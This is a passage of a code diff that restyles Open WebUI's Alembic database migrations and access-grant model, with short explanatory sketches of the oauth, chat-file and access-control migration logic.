str): conn.execute( sa.text(f'UPDATE "{table}" SET {column}_json = :val WHERE id = :id'), - {"val": json.dumps(parsed) if parsed else None, "id": uid}, + {'val': json.dumps(parsed) if parsed else None, 'id': uid}, ) # 3. Drop old TEXT column op.drop_column(table, column) # 4. 
Rename new JSON column → original name - op.alter_column(table, f"{column}_json", new_column_name=column) + op.alter_column(table, f'{column}_json', new_column_name=column) else: # PostgreSQL supports direct CAST op.alter_column( table, column, type_=sa.JSON(), - postgresql_using=f"{column}::json", + postgresql_using=f'{column}::json', ) def _convert_column_to_text(table: str, column: str): conn = op.get_bind() dialect = conn.dialect.name - if dialect == "sqlite": - op.add_column(table, sa.Column(f"{column}_text", sa.Text(), nullable=True)) + if dialect == 'sqlite': + op.add_column(table, sa.Column(f'{column}_text', sa.Text(), nullable=True)) rows = conn.execute(sa.text(f'SELECT id, {column} FROM "{table}"')).fetchall() for uid, raw in rows: conn.execute( sa.text(f'UPDATE "{table}" SET {column}_text = :val WHERE id = :id'), - {"val": json.dumps(raw) if raw else None, "id": uid}, + {'val': json.dumps(raw) if raw else None, 'id': uid}, ) op.drop_column(table, column) - op.alter_column(table, f"{column}_text", new_column_name=column) + op.alter_column(table, f'{column}_text', new_column_name=column) else: op.alter_column( table, column, type_=sa.Text(), - postgresql_using=f"to_json({column})::text", + postgresql_using=f'to_json({column})::text', ) def upgrade() -> None: - op.add_column( - "user", sa.Column("profile_banner_image_url", sa.Text(), nullable=True) - ) - op.add_column("user", sa.Column("timezone", sa.String(), nullable=True)) + op.add_column('user', sa.Column('profile_banner_image_url', sa.Text(), nullable=True)) + op.add_column('user', sa.Column('timezone', sa.String(), nullable=True)) - op.add_column("user", sa.Column("presence_state", sa.String(), nullable=True)) - op.add_column("user", sa.Column("status_emoji", sa.String(), nullable=True)) - op.add_column("user", sa.Column("status_message", sa.Text(), nullable=True)) - op.add_column( - "user", sa.Column("status_expires_at", sa.BigInteger(), nullable=True) - ) + op.add_column('user', sa.Column('presence_state', sa.String(), nullable=True)) + op.add_column('user', sa.Column('status_emoji', sa.String(), nullable=True)) + op.add_column('user', sa.Column('status_message', sa.Text(), nullable=True)) + op.add_column('user', sa.Column('status_expires_at', sa.BigInteger(), nullable=True)) - op.add_column("user", sa.Column("oauth", sa.JSON(), nullable=True)) + op.add_column('user', sa.Column('oauth', sa.JSON(), nullable=True)) # Convert info (TEXT/JSONField) → JSON - _convert_column_to_json("user", "info") + _convert_column_to_json('user', 'info') # Convert settings (TEXT/JSONField) → JSON - _convert_column_to_json("user", "settings") + _convert_column_to_json('user', 'settings') op.create_table( - "api_key", - sa.Column("id", sa.Text(), primary_key=True, unique=True), - sa.Column("user_id", sa.Text(), sa.ForeignKey("user.id", ondelete="CASCADE")), - sa.Column("key", sa.Text(), unique=True, nullable=False), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("expires_at", sa.BigInteger(), nullable=True), - sa.Column("last_used_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + 'api_key', + sa.Column('id', sa.Text(), primary_key=True, unique=True), + sa.Column('user_id', sa.Text(), sa.ForeignKey('user.id', ondelete='CASCADE')), + sa.Column('key', sa.Text(), unique=True, nullable=False), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('expires_at', sa.BigInteger(), nullable=True), + sa.Column('last_used_at', 
sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), ) conn = op.get_bind() - users = conn.execute( - sa.text('SELECT id, oauth_sub FROM "user" WHERE oauth_sub IS NOT NULL') - ).fetchall() + users = conn.execute(sa.text('SELECT id, oauth_sub FROM "user" WHERE oauth_sub IS NOT NULL')).fetchall() for uid, oauth_sub in users: if oauth_sub: # Example formats supported: # provider@sub # plain sub (stored as {"oidc": {"sub": sub}}) - if "@" in oauth_sub: - provider, sub = oauth_sub.split("@", 1) + if '@' in oauth_sub: + provider, sub = oauth_sub.split('@', 1) else: - provider, sub = "oidc", oauth_sub + provider, sub = 'oidc', oauth_sub - oauth_json = json.dumps({provider: {"sub": sub}}) + oauth_json = json.dumps({provider: {'sub': sub}}) conn.execute( sa.text('UPDATE "user" SET oauth = :oauth WHERE id = :id'), - {"oauth": oauth_json, "id": uid}, + {'oauth': oauth_json, 'id': uid}, ) - users_with_keys = conn.execute( - sa.text('SELECT id, api_key FROM "user" WHERE api_key IS NOT NULL') - ).fetchall() + users_with_keys = conn.execute(sa.text('SELECT id, api_key FROM "user" WHERE api_key IS NOT NULL')).fetchall() now = int(time.time()) for uid, api_key in users_with_keys: @@ -178,72 +168,70 @@ def upgrade() -> None: VALUES (:id, :user_id, :key, :created_at, :updated_at) """), { - "id": f"key_{uid}", - "user_id": uid, - "key": api_key, - "created_at": now, - "updated_at": now, + 'id': f'key_{uid}', + 'user_id': uid, + 'key': api_key, + 'created_at': now, + 'updated_at': now, }, ) - if conn.dialect.name == "sqlite": - _drop_sqlite_indexes_for_column("user", "api_key", conn) - _drop_sqlite_indexes_for_column("user", "oauth_sub", conn) + if conn.dialect.name == 'sqlite': + _drop_sqlite_indexes_for_column('user', 'api_key', conn) + _drop_sqlite_indexes_for_column('user', 'oauth_sub', conn) - with op.batch_alter_table("user") as batch_op: - batch_op.drop_column("api_key") - batch_op.drop_column("oauth_sub") + with op.batch_alter_table('user') as batch_op: + batch_op.drop_column('api_key') + batch_op.drop_column('oauth_sub') def downgrade() -> None: # --- 1. Restore old oauth_sub column --- - op.add_column("user", sa.Column("oauth_sub", sa.Text(), nullable=True)) + op.add_column('user', sa.Column('oauth_sub', sa.Text(), nullable=True)) conn = op.get_bind() - users = conn.execute( - sa.text('SELECT id, oauth FROM "user" WHERE oauth IS NOT NULL') - ).fetchall() + users = conn.execute(sa.text('SELECT id, oauth FROM "user" WHERE oauth IS NOT NULL')).fetchall() for uid, oauth in users: try: data = json.loads(oauth) provider = list(data.keys())[0] - sub = data[provider].get("sub") - oauth_sub = f"{provider}@{sub}" + sub = data[provider].get('sub') + oauth_sub = f'{provider}@{sub}' except Exception: oauth_sub = None conn.execute( sa.text('UPDATE "user" SET oauth_sub = :oauth_sub WHERE id = :id'), - {"oauth_sub": oauth_sub, "id": uid}, + {'oauth_sub': oauth_sub, 'id': uid}, ) - op.drop_column("user", "oauth") + op.drop_column('user', 'oauth') # --- 2. 
Restore api_key field --- - op.add_column("user", sa.Column("api_key", sa.String(), nullable=True)) + op.add_column('user', sa.Column('api_key', sa.String(), nullable=True)) # Restore values from api_key - keys = conn.execute(sa.text("SELECT user_id, key FROM api_key")).fetchall() + keys = conn.execute(sa.text('SELECT user_id, key FROM api_key')).fetchall() for uid, key in keys: conn.execute( sa.text('UPDATE "user" SET api_key = :key WHERE id = :id'), - {"key": key, "id": uid}, + {'key': key, 'id': uid}, ) # Drop new table - op.drop_table("api_key") + op.drop_table('api_key') - with op.batch_alter_table("user") as batch_op: - batch_op.drop_column("profile_banner_image_url") - batch_op.drop_column("timezone") + with op.batch_alter_table('user') as batch_op: + batch_op.drop_column('profile_banner_image_url') + batch_op.drop_column('timezone') - batch_op.drop_column("presence_state") - batch_op.drop_column("status_emoji") - batch_op.drop_column("status_message") - batch_op.drop_column("status_expires_at") + batch_op.drop_column('presence_state') + batch_op.drop_column('status_emoji') + batch_op.drop_column('status_message') + batch_op.drop_column('status_expires_at') # Convert info (JSON) → TEXT - _convert_column_to_text("user", "info") + _convert_column_to_text('user', 'info') # Convert settings (JSON) → TEXT - _convert_column_to_text("user", "settings") + _convert_column_to_text('user', 'settings')
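
Besides moving api_key into its own table and converting info/settings to JSON, the migration above converts oauth_sub using two legacy encodings: 'provider@sub', and a bare sub treated as OIDC. A self-contained sketch of exactly that parsing rule:

import json

def oauth_sub_to_json(oauth_sub: str) -> str:
    # 'provider@sub' splits on the first '@'; a bare sub defaults to 'oidc'.
    if '@' in oauth_sub:
        provider, sub = oauth_sub.split('@', 1)
    else:
        provider, sub = 'oidc', oauth_sub
    return json.dumps({provider: {'sub': sub}})

assert oauth_sub_to_json('google@12345') == '{"google": {"sub": "12345"}}'
assert oauth_sub_to_json('12345') == '{"oidc": {"sub": "12345"}}'
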
backend/open_webui/migrations/versions/b2c3d4e5f6a7_add_scim_column_to_user_table.py+4 −4 modified@@ -12,15 +12,15 @@ import sqlalchemy as sa # revision identifiers, used by Alembic. -revision: str = "b2c3d4e5f6a7" -down_revision: Union[str, None] = "a1b2c3d4e5f6" +revision: str = 'b2c3d4e5f6a7' +down_revision: Union[str, None] = 'a1b2c3d4e5f6' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: - op.add_column("user", sa.Column("scim", sa.JSON(), nullable=True)) + op.add_column('user', sa.Column('scim', sa.JSON(), nullable=True)) def downgrade() -> None: - op.drop_column("user", "scim") + op.drop_column('user', 'scim')
backend/open_webui/migrations/versions/c0fbf31ca0db_update_file_table.py+8 −8 modified@@ -12,21 +12,21 @@ from alembic import op # revision identifiers, used by Alembic. -revision: str = "c0fbf31ca0db" -down_revision: Union[str, None] = "ca81bd47c050" +revision: str = 'c0fbf31ca0db' +down_revision: Union[str, None] = 'ca81bd47c050' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### - op.add_column("file", sa.Column("hash", sa.Text(), nullable=True)) - op.add_column("file", sa.Column("data", sa.JSON(), nullable=True)) - op.add_column("file", sa.Column("updated_at", sa.BigInteger(), nullable=True)) + op.add_column('file', sa.Column('hash', sa.Text(), nullable=True)) + op.add_column('file', sa.Column('data', sa.JSON(), nullable=True)) + op.add_column('file', sa.Column('updated_at', sa.BigInteger(), nullable=True)) def downgrade(): # ### commands auto generated by Alembic - please adjust! ### - op.drop_column("file", "updated_at") - op.drop_column("file", "data") - op.drop_column("file", "hash") + op.drop_column('file', 'updated_at') + op.drop_column('file', 'data') + op.drop_column('file', 'hash')
backend/open_webui/migrations/versions/c29facfe716b_update_file_table_path.py+13 −21 modified@@ -12,35 +12,33 @@ from sqlalchemy.sql import table, column from sqlalchemy import String, Text, JSON, and_ -revision = "c29facfe716b" -down_revision = "c69f45358db4" +revision = 'c29facfe716b' +down_revision = 'c69f45358db4' branch_labels = None depends_on = None def upgrade(): # 1. Add the `path` column to the "file" table. - op.add_column("file", sa.Column("path", sa.Text(), nullable=True)) + op.add_column('file', sa.Column('path', sa.Text(), nullable=True)) # 2. Convert the `meta` column from Text/JSONField to `JSON()` # Use Alembic's default batch_op for dialect compatibility. - with op.batch_alter_table("file", schema=None) as batch_op: + with op.batch_alter_table('file', schema=None) as batch_op: batch_op.alter_column( - "meta", + 'meta', type_=sa.JSON(), existing_type=sa.Text(), existing_nullable=True, nullable=True, - postgresql_using="meta::json", + postgresql_using='meta::json', ) # 3. Migrate legacy data from `meta` JSONField # Fetch and process `meta` data from the table, add values to the new `path` column as necessary. # We will use SQLAlchemy core bindings to ensure safety across different databases. - file_table = table( - "file", column("id", String), column("meta", JSON), column("path", Text) - ) + file_table = table('file', column('id', String), column('meta', JSON), column('path', Text)) # Create connection to the database connection = op.get_bind() @@ -55,24 +53,18 @@ def upgrade(): # Iterate over each row to extract and update the `path` from `meta` column for row in results: - if "path" in row.meta: + if 'path' in row.meta: # Extract the `path` field from the `meta` JSON - path = row.meta.get("path") + path = row.meta.get('path') # Update the `file` table with the new `path` value - connection.execute( - file_table.update() - .where(file_table.c.id == row.id) - .values({"path": path}) - ) + connection.execute(file_table.update().where(file_table.c.id == row.id).values({'path': path})) def downgrade(): # 1. Remove the `path` column - op.drop_column("file", "path") + op.drop_column('file', 'path') # 2. Revert the `meta` column back to Text/JSONField - with op.batch_alter_table("file", schema=None) as batch_op: - batch_op.alter_column( - "meta", type_=sa.Text(), existing_type=sa.JSON(), existing_nullable=True - ) + with op.batch_alter_table('file', schema=None) as batch_op: + batch_op.alter_column('meta', type_=sa.Text(), existing_type=sa.JSON(), existing_nullable=True)
backend/open_webui/migrations/versions/c440947495f3_add_chat_file_table.py+18 −20 modified@@ -12,45 +12,43 @@ import sqlalchemy as sa # revision identifiers, used by Alembic. -revision: str = "c440947495f3" -down_revision: Union[str, None] = "81cc2ce44d79" +revision: str = 'c440947495f3' +down_revision: Union[str, None] = '81cc2ce44d79' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: op.create_table( - "chat_file", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("user_id", sa.Text(), nullable=False), + 'chat_file', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('user_id', sa.Text(), nullable=False), sa.Column( - "chat_id", + 'chat_id', sa.Text(), - sa.ForeignKey("chat.id", ondelete="CASCADE"), + sa.ForeignKey('chat.id', ondelete='CASCADE'), nullable=False, ), sa.Column( - "file_id", + 'file_id', sa.Text(), - sa.ForeignKey("file.id", ondelete="CASCADE"), + sa.ForeignKey('file.id', ondelete='CASCADE'), nullable=False, ), - sa.Column("message_id", sa.Text(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + sa.Column('message_id', sa.Text(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), # indexes - sa.Index("ix_chat_file_chat_id", "chat_id"), - sa.Index("ix_chat_file_file_id", "file_id"), - sa.Index("ix_chat_file_message_id", "message_id"), - sa.Index("ix_chat_file_user_id", "user_id"), + sa.Index('ix_chat_file_chat_id', 'chat_id'), + sa.Index('ix_chat_file_file_id', 'file_id'), + sa.Index('ix_chat_file_message_id', 'message_id'), + sa.Index('ix_chat_file_user_id', 'user_id'), # unique constraints - sa.UniqueConstraint( - "chat_id", "file_id", name="uq_chat_file_chat_file" - ), # prevent duplicate entries + sa.UniqueConstraint('chat_id', 'file_id', name='uq_chat_file_chat_file'), # prevent duplicate entries ) pass def downgrade() -> None: - op.drop_table("chat_file") + op.drop_table('chat_file') pass
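
The uq_chat_file_chat_file constraint above guarantees a file is linked to a given chat at most once. A small demo against an in-memory SQLite copy of the table, trimmed to the relevant columns (a sketch, not patch code):

import sqlalchemy as sa
from sqlalchemy.exc import IntegrityError

engine = sa.create_engine('sqlite://')
metadata = sa.MetaData()
chat_file = sa.Table(
    'chat_file', metadata,
    sa.Column('id', sa.Text(), primary_key=True),
    sa.Column('chat_id', sa.Text(), nullable=False),
    sa.Column('file_id', sa.Text(), nullable=False),
    sa.UniqueConstraint('chat_id', 'file_id', name='uq_chat_file_chat_file'),
)
metadata.create_all(engine)

with engine.begin() as conn:
    conn.execute(chat_file.insert().values(id='1', chat_id='c1', file_id='f1'))
try:
    with engine.begin() as conn:
        conn.execute(chat_file.insert().values(id='2', chat_id='c1', file_id='f1'))
except IntegrityError:
    print('duplicate chat/file link rejected by uq_chat_file_chat_file')
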
backend/open_webui/migrations/versions/c69f45358db4_add_folder_table.py+17 −19 modified@@ -9,42 +9,40 @@ from alembic import op import sqlalchemy as sa -revision = "c69f45358db4" -down_revision = "3ab32c4b8f59" +revision = 'c69f45358db4' +down_revision = '3ab32c4b8f59' branch_labels = None depends_on = None def upgrade(): op.create_table( - "folder", - sa.Column("id", sa.Text(), nullable=False), - sa.Column("parent_id", sa.Text(), nullable=True), - sa.Column("user_id", sa.Text(), nullable=False), - sa.Column("name", sa.Text(), nullable=False), - sa.Column("items", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("is_expanded", sa.Boolean(), default=False, nullable=False), + 'folder', + sa.Column('id', sa.Text(), nullable=False), + sa.Column('parent_id', sa.Text(), nullable=True), + sa.Column('user_id', sa.Text(), nullable=False), + sa.Column('name', sa.Text(), nullable=False), + sa.Column('items', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('is_expanded', sa.Boolean(), default=False, nullable=False), + sa.Column('created_at', sa.DateTime(), server_default=sa.func.now(), nullable=False), sa.Column( - "created_at", sa.DateTime(), server_default=sa.func.now(), nullable=False - ), - sa.Column( - "updated_at", + 'updated_at', sa.DateTime(), nullable=False, server_default=sa.func.now(), onupdate=sa.func.now(), ), - sa.PrimaryKeyConstraint("id", "user_id"), + sa.PrimaryKeyConstraint('id', 'user_id'), ) op.add_column( - "chat", - sa.Column("folder_id", sa.Text(), nullable=True), + 'chat', + sa.Column('folder_id', sa.Text(), nullable=True), ) def downgrade(): - op.drop_column("chat", "folder_id") + op.drop_column('chat', 'folder_id') - op.drop_table("folder") + op.drop_table('folder')
backend/open_webui/migrations/versions/ca81bd47c050_add_config_table.py+9 −11 modified@@ -12,23 +12,21 @@ from alembic import op # revision identifiers, used by Alembic. -revision: str = "ca81bd47c050" -down_revision: Union[str, None] = "7e5b5dc7342b" +revision: str = 'ca81bd47c050' +down_revision: Union[str, None] = '7e5b5dc7342b' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade(): op.create_table( - "config", - sa.Column("id", sa.Integer, primary_key=True), - sa.Column("data", sa.JSON(), nullable=False), - sa.Column("version", sa.Integer, nullable=False), + 'config', + sa.Column('id', sa.Integer, primary_key=True), + sa.Column('data', sa.JSON(), nullable=False), + sa.Column('version', sa.Integer, nullable=False), + sa.Column('created_at', sa.DateTime(), nullable=False, server_default=sa.func.now()), sa.Column( - "created_at", sa.DateTime(), nullable=False, server_default=sa.func.now() - ), - sa.Column( - "updated_at", + 'updated_at', sa.DateTime(), nullable=True, server_default=sa.func.now(), @@ -38,4 +36,4 @@ def upgrade(): def downgrade(): - op.drop_table("config") + op.drop_table('config')
backend/open_webui/migrations/versions/d31026856c01_update_folder_table_data.py+4 −4 modified@@ -9,15 +9,15 @@ from alembic import op import sqlalchemy as sa -revision = "d31026856c01" -down_revision = "9f0c9cd09105" +revision = 'd31026856c01' +down_revision = '9f0c9cd09105' branch_labels = None depends_on = None def upgrade(): - op.add_column("folder", sa.Column("data", sa.JSON(), nullable=True)) + op.add_column('folder', sa.Column('data', sa.JSON(), nullable=True)) def downgrade(): - op.drop_column("folder", "data") + op.drop_column('folder', 'data')
backend/open_webui/migrations/versions/f1e2d3c4b5a6_add_access_grant_table.py+101 −126 modified@@ -20,8 +20,8 @@ from open_webui.migrations.util import get_existing_tables -revision: str = "f1e2d3c4b5a6" -down_revision: Union[str, None] = "8452d01d26d7" +revision: str = 'f1e2d3c4b5a6' +down_revision: Union[str, None] = '8452d01d26d7' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None @@ -30,48 +30,48 @@ def upgrade() -> None: existing_tables = set(get_existing_tables()) # Create access_grant table - if "access_grant" not in existing_tables: + if 'access_grant' not in existing_tables: op.create_table( - "access_grant", - sa.Column("id", sa.Text(), nullable=False, primary_key=True), - sa.Column("resource_type", sa.Text(), nullable=False), - sa.Column("resource_id", sa.Text(), nullable=False), - sa.Column("principal_type", sa.Text(), nullable=False), - sa.Column("principal_id", sa.Text(), nullable=False), - sa.Column("permission", sa.Text(), nullable=False), - sa.Column("created_at", sa.BigInteger(), nullable=False), + 'access_grant', + sa.Column('id', sa.Text(), nullable=False, primary_key=True), + sa.Column('resource_type', sa.Text(), nullable=False), + sa.Column('resource_id', sa.Text(), nullable=False), + sa.Column('principal_type', sa.Text(), nullable=False), + sa.Column('principal_id', sa.Text(), nullable=False), + sa.Column('permission', sa.Text(), nullable=False), + sa.Column('created_at', sa.BigInteger(), nullable=False), sa.UniqueConstraint( - "resource_type", - "resource_id", - "principal_type", - "principal_id", - "permission", - name="uq_access_grant_grant", + 'resource_type', + 'resource_id', + 'principal_type', + 'principal_id', + 'permission', + name='uq_access_grant_grant', ), ) op.create_index( - "idx_access_grant_resource", - "access_grant", - ["resource_type", "resource_id"], + 'idx_access_grant_resource', + 'access_grant', + ['resource_type', 'resource_id'], ) op.create_index( - "idx_access_grant_principal", - "access_grant", - ["principal_type", "principal_id"], + 'idx_access_grant_principal', + 'access_grant', + ['principal_type', 'principal_id'], ) # Backfill existing access_control JSON data conn = op.get_bind() # Tables with access_control JSON columns: (table_name, resource_type) resource_tables = [ - ("knowledge", "knowledge"), - ("prompt", "prompt"), - ("tool", "tool"), - ("model", "model"), - ("note", "note"), - ("channel", "channel"), - ("file", "file"), + ('knowledge', 'knowledge'), + ('prompt', 'prompt'), + ('tool', 'tool'), + ('model', 'model'), + ('note', 'note'), + ('channel', 'channel'), + ('file', 'file'), ] now = int(time.time()) @@ -83,9 +83,7 @@ def upgrade() -> None: # Query all rows try: - result = conn.execute( - sa.text(f'SELECT id, access_control FROM "{table_name}"') - ) + result = conn.execute(sa.text(f'SELECT id, access_control FROM "{table_name}"')) rows = result.fetchall() except Exception: continue @@ -99,19 +97,16 @@ def upgrade() -> None: # EXCEPTION: files with NULL are PRIVATE (owner-only), not public is_null = ( access_control_json is None - or access_control_json == "null" - or ( - isinstance(access_control_json, str) - and access_control_json.strip().lower() == "null" - ) + or access_control_json == 'null' + or (isinstance(access_control_json, str) and access_control_json.strip().lower() == 'null') ) if is_null: # Files: NULL = private (no entry needed, owner has implicit access) # Other resources: NULL = public (insert user:* for read) - if resource_type == "file": + if 
resource_type == 'file': continue # Private - no entry needed - key = (resource_type, resource_id, "user", "*", "read") + key = (resource_type, resource_id, 'user', '*', 'read') if key not in inserted: try: conn.execute( @@ -120,13 +115,13 @@ def upgrade() -> None: VALUES (:id, :resource_type, :resource_id, :principal_type, :principal_id, :permission, :created_at) """), { - "id": str(uuid.uuid4()), - "resource_type": resource_type, - "resource_id": resource_id, - "principal_type": "user", - "principal_id": "*", - "permission": "read", - "created_at": now, + 'id': str(uuid.uuid4()), + 'resource_type': resource_type, + 'resource_id': resource_id, + 'principal_type': 'user', + 'principal_id': '*', + 'permission': 'read', + 'created_at': now, }, ) inserted.add(key) @@ -149,28 +144,24 @@ def upgrade() -> None: continue # Check if it's effectively empty (no read/write keys with content) - read_data = access_control_json.get("read", {}) - write_data = access_control_json.get("write", {}) + read_data = access_control_json.get('read', {}) + write_data = access_control_json.get('write', {}) - has_read_grants = read_data.get("group_ids", []) or read_data.get( - "user_ids", [] - ) - has_write_grants = write_data.get("group_ids", []) or write_data.get( - "user_ids", [] - ) + has_read_grants = read_data.get('group_ids', []) or read_data.get('user_ids', []) + has_write_grants = write_data.get('group_ids', []) or write_data.get('user_ids', []) if not has_read_grants and not has_write_grants: # Empty permissions = private, no grants needed continue # Extract permissions and insert into access_grant table - for permission in ["read", "write"]: + for permission in ['read', 'write']: perm_data = access_control_json.get(permission, {}) if not perm_data: continue - for group_id in perm_data.get("group_ids", []): - key = (resource_type, resource_id, "group", group_id, permission) + for group_id in perm_data.get('group_ids', []): + key = (resource_type, resource_id, 'group', group_id, permission) if key in inserted: continue try: @@ -180,21 +171,21 @@ def upgrade() -> None: VALUES (:id, :resource_type, :resource_id, :principal_type, :principal_id, :permission, :created_at) """), { - "id": str(uuid.uuid4()), - "resource_type": resource_type, - "resource_id": resource_id, - "principal_type": "group", - "principal_id": group_id, - "permission": permission, - "created_at": now, + 'id': str(uuid.uuid4()), + 'resource_type': resource_type, + 'resource_id': resource_id, + 'principal_type': 'group', + 'principal_id': group_id, + 'permission': permission, + 'created_at': now, }, ) inserted.add(key) except Exception: pass - for user_id in perm_data.get("user_ids", []): - key = (resource_type, resource_id, "user", user_id, permission) + for user_id in perm_data.get('user_ids', []): + key = (resource_type, resource_id, 'user', user_id, permission) if key in inserted: continue try: @@ -204,13 +195,13 @@ def upgrade() -> None: VALUES (:id, :resource_type, :resource_id, :principal_type, :principal_id, :permission, :created_at) """), { - "id": str(uuid.uuid4()), - "resource_type": resource_type, - "resource_id": resource_id, - "principal_type": "user", - "principal_id": user_id, - "permission": permission, - "created_at": now, + 'id': str(uuid.uuid4()), + 'resource_type': resource_type, + 'resource_id': resource_id, + 'principal_type': 'user', + 'principal_id': user_id, + 'permission': permission, + 'created_at': now, }, ) inserted.add(key) @@ -223,7 +214,7 @@ def upgrade() -> None: continue try: with 
op.batch_alter_table(table_name) as batch: - batch.drop_column("access_control") + batch.drop_column('access_control') except Exception: pass @@ -235,20 +226,20 @@ def downgrade() -> None: # Resource tables mapping: (table_name, resource_type) resource_tables = [ - ("knowledge", "knowledge"), - ("prompt", "prompt"), - ("tool", "tool"), - ("model", "model"), - ("note", "note"), - ("channel", "channel"), - ("file", "file"), + ('knowledge', 'knowledge'), + ('prompt', 'prompt'), + ('tool', 'tool'), + ('model', 'model'), + ('note', 'note'), + ('channel', 'channel'), + ('file', 'file'), ] # Step 1: Re-add access_control columns to resource tables for table_name, _ in resource_tables: try: with op.batch_alter_table(table_name) as batch: - batch.add_column(sa.Column("access_control", sa.JSON(), nullable=True)) + batch.add_column(sa.Column('access_control', sa.JSON(), nullable=True)) except Exception: pass @@ -262,7 +253,7 @@ def downgrade() -> None: FROM access_grant WHERE resource_type = :resource_type """), - {"resource_type": resource_type}, + {'resource_type': resource_type}, ) rows = result.fetchall() except Exception: @@ -278,75 +269,59 @@ def downgrade() -> None: if resource_id not in resource_grants: resource_grants[resource_id] = { - "is_public": False, - "read": {"group_ids": [], "user_ids": []}, - "write": {"group_ids": [], "user_ids": []}, + 'is_public': False, + 'read': {'group_ids': [], 'user_ids': []}, + 'write': {'group_ids': [], 'user_ids': []}, } # Handle public access (user:* for read) - if ( - principal_type == "user" - and principal_id == "*" - and permission == "read" - ): - resource_grants[resource_id]["is_public"] = True + if principal_type == 'user' and principal_id == '*' and permission == 'read': + resource_grants[resource_id]['is_public'] = True continue # Add to appropriate list - if permission in ["read", "write"]: - if principal_type == "group": - if ( - principal_id - not in resource_grants[resource_id][permission]["group_ids"] - ): - resource_grants[resource_id][permission]["group_ids"].append( - principal_id - ) - elif principal_type == "user": - if ( - principal_id - not in resource_grants[resource_id][permission]["user_ids"] - ): - resource_grants[resource_id][permission]["user_ids"].append( - principal_id - ) + if permission in ['read', 'write']: + if principal_type == 'group': + if principal_id not in resource_grants[resource_id][permission]['group_ids']: + resource_grants[resource_id][permission]['group_ids'].append(principal_id) + elif principal_type == 'user': + if principal_id not in resource_grants[resource_id][permission]['user_ids']: + resource_grants[resource_id][permission]['user_ids'].append(principal_id) # Step 3: Update each resource with reconstructed JSON for resource_id, grants in resource_grants.items(): - if grants["is_public"]: + if grants['is_public']: # Public = NULL access_control_value = None elif ( - not grants["read"]["group_ids"] - and not grants["read"]["user_ids"] - and not grants["write"]["group_ids"] - and not grants["write"]["user_ids"] + not grants['read']['group_ids'] + and not grants['read']['user_ids'] + and not grants['write']['group_ids'] + and not grants['write']['user_ids'] ): # No grants = should not happen (would mean no entries), default to {} access_control_value = json.dumps({}) else: # Custom permissions access_control_value = json.dumps( { - "read": grants["read"], - "write": grants["write"], + 'read': grants['read'], + 'write': grants['write'], } ) try: conn.execute( - sa.text( - f'UPDATE "{table_name}" SET 
access_control = :access_control WHERE id = :id' - ), - {"access_control": access_control_value, "id": resource_id}, + sa.text(f'UPDATE "{table_name}" SET access_control = :access_control WHERE id = :id'), + {'access_control': access_control_value, 'id': resource_id}, ) except Exception: pass # Step 4: Set all resources WITHOUT entries to private # For files: NULL means private (owner-only), so leave as NULL # For other resources: {} means private, so update to {} - if resource_type != "file": + if resource_type != 'file': try: conn.execute( sa.text(f""" @@ -357,13 +332,13 @@ def downgrade() -> None: ) AND access_control IS NULL """), - {"private_value": json.dumps({}), "resource_type": resource_type}, + {'private_value': json.dumps({}), 'resource_type': resource_type}, ) except Exception: pass # For files, NULL stays NULL - no action needed # Step 5: Drop the access_grant table - op.drop_index("idx_access_grant_principal", table_name="access_grant") - op.drop_index("idx_access_grant_resource", table_name="access_grant") - op.drop_table("access_grant") + op.drop_index('idx_access_grant_principal', table_name='access_grant') + op.drop_index('idx_access_grant_resource', table_name='access_grant') + op.drop_table('access_grant')
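
Taken together, the upgrade/downgrade above encode three legacy access states. A compact summary of that mapping as a function, derived from the branches in this migration (not code from the patch):

from typing import Optional

def legacy_visibility(access_control: Optional[dict], resource_type: str) -> str:
    # NULL: public read for most resources, but private for 'file' rows.
    if access_control is None:
        return 'private (owner-only)' if resource_type == 'file' else "public read ('user', '*', 'read' grant)"
    read = access_control.get('read', {})
    write = access_control.get('write', {})
    # {} or empty read/write lists: private, no grant rows are created.
    if not (read.get('group_ids') or read.get('user_ids')
            or write.get('group_ids') or write.get('user_ids')):
        return 'private (owner-only)'
    # Otherwise: one access_grant row per (principal, permission) pair.
    return 'explicit user/group grants'

assert legacy_visibility(None, 'note') == "public read ('user', '*', 'read' grant)"
assert legacy_visibility(None, 'file') == 'private (owner-only)'
assert legacy_visibility({}, 'note') == 'private (owner-only)'
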
backend/open_webui/models/access_grants.py +99 −132 modified
@@ -19,28 +19,24 @@
 class AccessGrant(Base):
-    __tablename__ = "access_grant"
+    __tablename__ = 'access_grant'

     id = Column(Text, primary_key=True)
-    resource_type = Column(
-        Text, nullable=False
-    )  # "knowledge", "model", "prompt", "tool", "note", "channel", "file"
+    resource_type = Column(Text, nullable=False)  # "knowledge", "model", "prompt", "tool", "note", "channel", "file"
     resource_id = Column(Text, nullable=False)
     principal_type = Column(Text, nullable=False)  # "user" or "group"
-    principal_id = Column(
-        Text, nullable=False
-    )  # user_id, group_id, or "*" (wildcard for public)
+    principal_id = Column(Text, nullable=False)  # user_id, group_id, or "*" (wildcard for public)
     permission = Column(Text, nullable=False)  # "read" or "write"
     created_at = Column(BigInteger, nullable=False)

     __table_args__ = (
         UniqueConstraint(
-            "resource_type",
-            "resource_id",
-            "principal_type",
-            "principal_id",
-            "permission",
-            name="uq_access_grant_grant",
+            'resource_type',
